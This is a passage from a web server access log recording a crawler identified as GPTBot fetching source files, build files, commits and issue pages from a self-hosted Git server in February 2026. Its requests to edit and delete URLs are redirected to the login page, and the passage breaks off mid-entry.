git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 11246] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 850] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 423] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11162] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 9952] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:17:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10123] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:17:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 11090] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" -[17/Feb/2026:17:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:17:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 10123] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:17:36:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/storage.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/storage.py" -[17/Feb/2026:17:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19508] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:36:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PythonTest/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" -[17/Feb/2026:17:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PythonTest/README.md" -[17/Feb/2026:17:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 10200] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" -[17/Feb/2026:17:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 9805] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" -[17/Feb/2026:17:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11217] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" -[17/Feb/2026:17:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" -[17/Feb/2026:17:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" -[17/Feb/2026:17:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 865] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/README.md" -[17/Feb/2026:17:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19508] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19513] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:36:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PythonTest/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/README.md" -[17/Feb/2026:17:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PythonTest/README.md" -[17/Feb/2026:17:36:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PythonTest/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/README.md" -[17/Feb/2026:17:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PythonTest/README.md" -[17/Feb/2026:17:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15635] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19507] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10323] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11598] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17055] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:17:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh?display=source" [Client 74.7.227.38] [Length 15171] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh" -[17/Feb/2026:17:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" -[17/Feb/2026:17:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild" [Client 74.7.227.38] [Length 49754] [Gzip 12.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build" -[17/Feb/2026:17:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild" [Client 74.7.227.38] [Length 46269] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" -[17/Feb/2026:17:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fdist" [Client 74.7.227.38] [Length 18030] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" -[17/Feb/2026:17:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fdist" [Client 74.7.227.38] [Length 20033] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" -[17/Feb/2026:17:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33676] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 